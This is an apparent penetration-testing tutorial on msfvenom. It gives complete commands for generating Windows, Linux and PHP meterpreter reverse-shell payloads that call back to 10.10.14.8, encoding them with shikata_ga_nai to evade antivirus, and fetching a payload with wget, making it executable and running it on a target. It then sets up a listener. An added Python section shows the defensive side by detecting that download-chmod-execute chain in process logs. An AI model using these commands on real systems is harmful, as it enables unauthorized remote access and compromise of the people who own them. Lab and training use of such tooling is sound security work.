msfvenom is a standalone command-line tool used to generate custom payloads. It combines the features of msfpayload and msfencode into one tool. You can use it to create shellcode or binaries to execute exploits manually or deliver via third-party methods.
Getting Help with msfvenom
Use the help flag to view available arguments and usage examples:
msfvenom -h
This shows details like:
- How to list payloads, encoders, platforms, and formats
- Syntax help for advanced options
- Usage examples
To avoid errors, always refer to this help output if you’re unsure how to structure a command.
Basic Syntax
msfvenom -p <payload> LHOST=<attacker IP> LPORT=<port> -f <format> -o <output_file>
-p — Specify the payload
LHOST — Your attacker IP (listener)
LPORT — Listening port on your machine
-f — Output format (exe, elf, raw, php, etc.)
-o — Output file name
To view all options for a specific payload:
msfvenom -p <payload> --list-options
Common Output Formats
Format | Description |
---|---|
exe | Windows executable |
elf | Linux binary |
php | PHP webshell |
asp | ASP shell for Windows servers |
raw | Raw shellcode |
c | C-formatted shellcode |
psh | PowerShell script |
To list all available formats:
msfvenom --list formats
Example Payloads
Windows Reverse Shell (EXE)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f exe -o win_shell.exe
Linux Reverse Shell (ELF)
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f elf -o shell.elf
PHP Reverse Shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f raw -o shell.php
C Shellcode Output
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f c
If unsure about a format name, check:
msfvenom --list formats
Listing Available Payloads
You can explore payloads in multiple ways:
msfvenom -l payloads
Or from within msfconsole:
show payloads
To filter by platform or type:
search type:payload platform:linux
search type:payload platform:windows
You can also view encoders:
msfvenom -l encoders
Encoder Usage (Optional)
If detection is a concern, you can encode the payload to obfuscate it:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o evaded.exe
-e — Encoder name
-i — Number of encoding iterations
List available encoders:
msfvenom -l encoders
Encoders can slightly obfuscate your payload but are no longer very effective against modern AVs.
Payload Delivery and Listener Setup
After generating your payload (e.g., shell.elf), transfer it to the target:
python3 -m http.server 9000
wget http://<attacker_ip>:9000/shell.elf
chmod +x shell.elf
./shell.elf
Then, set up a handler in msfconsole:
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.8
set LPORT 4444
run
Use sessions to view or interact with your meterpreter shells:
sessions # List active sessions
sessions -i 1 # Interact with session ID 1
background # Background a session
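From the defender's side, the transfer steps above leave a recognizable sequence in process-execution logs: a download over HTTP, chmod +x on the same file, then its execution. The following is an added example, not part of the original page; the log format, sample lines, and function names are constructed for illustration.

```python
import re
import shlex
from datetime import datetime, timedelta

# Constructed sample: "<ISO timestamp> <host> <command line>" process-execution events.
SAMPLE_LOG = """\
2024-05-01T10:00:01 web01 wget http://10.10.14.8:9000/shell.elf
2024-05-01T10:00:05 web01 chmod +x shell.elf
2024-05-01T10:00:07 web01 ./shell.elf
2024-05-01T10:02:00 web01 wget https://example.org/report.pdf
2024-05-01T10:03:00 db01 chmod +x backup.sh
2024-05-01T10:03:02 db01 ./backup.sh
"""

DOWNLOADERS = {"wget", "curl"}
# chmod modes that set an execute bit: symbolic "+x" forms or an octal mode with an odd digit.
EXEC_MODE = re.compile(r"^(?:[ugoa]*\+[rwxXst]*x[rwxXst]*|[0-7]{0,3}[1357][0-7]{0,3})$")

def basename(path):
    return path.rstrip("/").rsplit("/", 1)[-1]

def find_download_exec_chains(log_text, window=timedelta(minutes=10)):
    """Return one alert per file that was downloaded, made executable, then run on a host."""
    seen = {}    # (host, filename) -> {"url", "time", "chmod"}
    alerts = []
    for line in log_text.strip().splitlines():
        ts, host, cmd = line.split(" ", 2)
        when = datetime.fromisoformat(ts)
        argv = shlex.split(cmd)
        prog = basename(argv[0])
        if prog in DOWNLOADERS:
            # Assumption: the saved file name is the URL's last path segment (wget default).
            for arg in argv[1:]:
                if re.match(r"https?://", arg):
                    seen[(host, basename(arg))] = {"url": arg, "time": when, "chmod": False}
        elif prog == "chmod" and len(argv) >= 3 and EXEC_MODE.match(argv[1]):
            for target in argv[2:]:
                entry = seen.get((host, basename(target)))
                if entry and when - entry["time"] <= window:
                    entry["chmod"] = True
        else:
            entry = seen.get((host, prog))
            if entry and entry["chmod"] and when - entry["time"] <= window:
                alerts.append({"host": host, "file": prog, "url": entry["url"], "time": ts})
                del seen[(host, prog)]
    return alerts

if __name__ == "__main__":
    print(find_download_exec_chains(SAMPLE_LOG))
```

Only the web01 chain is flagged: the PDF download is never made executable, and backup.sh on db01 was never downloaded.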
Troubleshooting Payloads
If you get errors like:
[-] Cannot create payload. Check options.
Double-check that:
- Payload is valid (-p windows/meterpreter/reverse_tcp, not window/metrprter)
- Format exists (-f elf, -f exe, etc.)
- All required parameters (LHOST, LPORT) are set
- Platform and architecture match your target
Always use the following to confirm payload requirements before generating:
msfvenom -h
msfvenom -p <payload> --list-options